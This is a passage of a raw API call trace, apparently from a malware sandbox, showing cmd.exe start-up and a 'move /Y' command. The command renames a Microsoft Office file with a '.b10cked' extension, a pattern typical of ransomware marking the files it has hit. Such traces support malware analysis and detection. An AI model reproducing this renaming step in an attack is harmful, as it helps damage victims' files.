| out: lpBuffer=0x28f7fc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.051] GetConsoleOutputCP () returned 0x1b5 [0173.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.052] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.052] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.052] GetEnvironmentStringsW () returned 0x370218* [0173.053] FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.053] GetEnvironmentStringsW () returned 0x370218* [0173.053] FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e79c | out: phkResult=0x28e79c*=0x40) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0xa8, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x0, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegCloseKey (hKey=0x40) returned 0x0 [0173.053] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e79c | out: phkResult=0x28e79c*=0x40) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x0, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.054] RegCloseKey (hKey=0x40) returned 0x0 [0173.054] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0173.054] srand (_Seed=0x5b886388) [0173.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" [0173.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" [0173.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.054] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.054] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.054] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.054] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.054] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.055] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.055] GetEnvironmentStringsW () returned 0x372368* [0173.055] FreeEnvironmentStringsW (penv=0x372368) returned 1 [0173.055] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.055] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.055] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.055] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.055] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.055] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.055] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f568 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f568, lpFilePart=0x28f564 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f564*="Desktop") returned 0x18 [0173.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.055] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.056] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.056] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.056] GetEnvironmentStringsW () returned 0x370218* [0173.056] FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.057] GetConsoleOutputCP () returned 0x1b5 [0173.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.057] GetUserDefaultLCID () returned 0x409 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="0") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="0") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="1") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.059] GetConsoleTitleW (in: lpConsoleTitle=0x360938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.059] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.059] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.060] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.060] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.060] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.060] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.060] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.060] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.063] GetConsoleTitleW (in: lpConsoleTitle=0x28f3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.064] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.064] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.064] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.064] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.064] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.066] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f15c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f154, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f154*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.067] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~2.trx")) returned 0x2020 [0173.068] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.068] SetErrorMode (uMode=0x0) returned 0x0 [0173.068] SetErrorMode (uMode=0x1) returned 0x0 [0173.068] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x28eae4, lpFilePart=0x28eacc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", lpFilePart=0x28eacc*="PUB6IN~2.TRX") returned 0x3c [0173.068] SetErrorMode (uMode=0x0) returned 0x1 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~2.trx")) returned 0x2020 [0173.068] SetErrorMode (uMode=0x0) returned 0x0 [0173.068] SetErrorMode (uMode=0x1) returned 0x0 [0173.068] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x28ef60, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", lpFilePart=0x28ecf8*="PUB6IN~2.TRX") returned 0x3c [0173.068] SetErrorMode (uMode=0x0) returned 0x1 [0173.069] SetErrorMode (uMode=0x0) returned 0x0 [0173.069] SetErrorMode (uMode=0x1) returned 0x0 [0173.069] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f168, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x28ecf8*="PUB6INTL.REST.trx_dll.b10cked") returned 0x4d [0173.069] SetErrorMode (uMode=0x0) returned 0x1 [0173.069] SetLastError (dwErrCode=0x0) [0173.069] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll.b10cked")) returned 0xffffffff [0173.069] GetLastError () returned 0x2 [0173.069] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e674, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e674) returned 0x372138 [0173.069] FindNextFileW (in: hFindFile=0x372138, lpFindFileData=0x28e674 | out: lpFindFileData=0x28e674) returned 0 [0173.069] GetLastError () returned 0x12 [0173.070] FindClose (in: hFindFile=0x372138 | out: hFindFile=0x372138) returned 1 [0173.071] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc8) returned 0x372138 [0173.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28e90c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0173.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x28e90c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0173.071] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll")) returned 0x2020 [0173.071] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.071] FindClose (in: hFindFile=0x372138 | 